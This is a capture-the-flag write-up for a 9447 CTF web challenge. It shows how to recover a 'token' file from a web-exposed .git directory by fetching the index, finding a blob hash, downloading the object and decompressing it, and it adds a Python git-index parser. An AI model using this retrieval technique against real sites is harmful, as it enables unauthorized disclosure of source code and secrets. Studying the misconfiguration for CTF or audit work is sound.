Introduction
This is a write-up about one of the 9447 CTF web challenges. The goal of this challenge was to recover a file from a web-accessible git repository.
Discovering
We are given a URL to an HTML page which suggests that the target is using git. The first thing I checked was whether a .git folder exists at the root of the website.
http://tumorous.9447.plumbing/.git/
The HTTP request returned "403 Forbidden", which means the directory exists but we can't access it.
Index file
The second step was to download the index file. The index is a binary file containing a sorted list of path names, each with permissions and the SHA1 of a blob object.
http://tumorous.9447.plumbing/.git/index
By opening the index file with a hexadecimal editor, we can see there is a "token" file with the SHA1 0d2fce4623aa8cd8fcaae969c9af4c73e0b4bfe0.
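Instead of reading the index in a hexadecimal editor, its entries can be listed programmatically, which is also a quick way to audit what an exposed index file discloses. The parser below is an added example, not part of the original write-up; it assumes index version 2 or 3, and `build_sample_index` with its placeholder `index.html` entry is constructed sample input.

```python
import hashlib
import struct

ENTRY_FIXED = struct.Struct(">10I20sH")  # 10 stat fields, SHA-1, flags = 62 bytes

def parse_index(data):
    """Return [(mode, sha1_hex, path)] from a git index (versions 2 and 3)."""
    magic, version, count = struct.unpack_from(">4sII", data, 0)
    if magic != b"DIRC":
        raise ValueError("not a git index file")
    if version not in (2, 3):
        raise ValueError("unsupported index version %d" % version)
    if hashlib.sha1(data[:-20]).digest() != data[-20:]:
        raise ValueError("trailing SHA-1 checksum mismatch")
    entries, off = [], 12
    for _ in range(count):
        fields = ENTRY_FIXED.unpack_from(data, off)
        mode, sha1, flags = fields[6], fields[10], fields[11]
        name_off = off + ENTRY_FIXED.size
        if version == 3 and flags & 0x4000:  # extended flags add 2 bytes
            name_off += 2
        end = data.index(b"\x00", name_off)  # path name is NUL-terminated
        path = data[name_off:end].decode("utf-8", "replace")
        entries.append((oct(mode), sha1.hex(), path))
        off += (end - off + 8) & ~7  # entries are NUL-padded to a multiple of 8
    return entries

def build_sample_index(files):
    """Constructed sample input: a minimal version-2 index for `files`."""
    body = struct.pack(">4sII", b"DIRC", 2, len(files))
    for path, sha1_hex in sorted(files):
        name = path.encode()
        entry = ENTRY_FIXED.pack(0, 0, 0, 0, 0, 0, 0o100644, 0, 0, 0,
                                 bytes.fromhex(sha1_hex), len(name)) + name
        entry += b"\x00" * (((len(entry) + 8) & ~7) - len(entry))
        body += entry
    return body + hashlib.sha1(body).digest()

if __name__ == "__main__":
    sample = build_sample_index([
        ("token", "0d2fce4623aa8cd8fcaae969c9af4c73e0b4bfe0"),  # SHA-1 from the write-up
        ("index.html", "1" * 40),  # constructed placeholder SHA-1
    ])
    for mode, sha1_hex, path in parse_index(sample):
        print(mode, sha1_hex, path)
```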
Reading the object file
We can download the token object file with the following URL:
http://tumorous.9447.plumbing/.git/objects/0d/2fce4623aa8cd8fcaae969c9af4c73e0b4bfe0
The last step to get the flag is to decompress the object. One simple way to do it is to use Python and zlib:
python3 -c "import zlib,sys;print(repr(zlib.decompress(sys.stdin.buffer.read())))" < 2fce4623aa8cd8fcaae969c9af4c73e0b4bfe0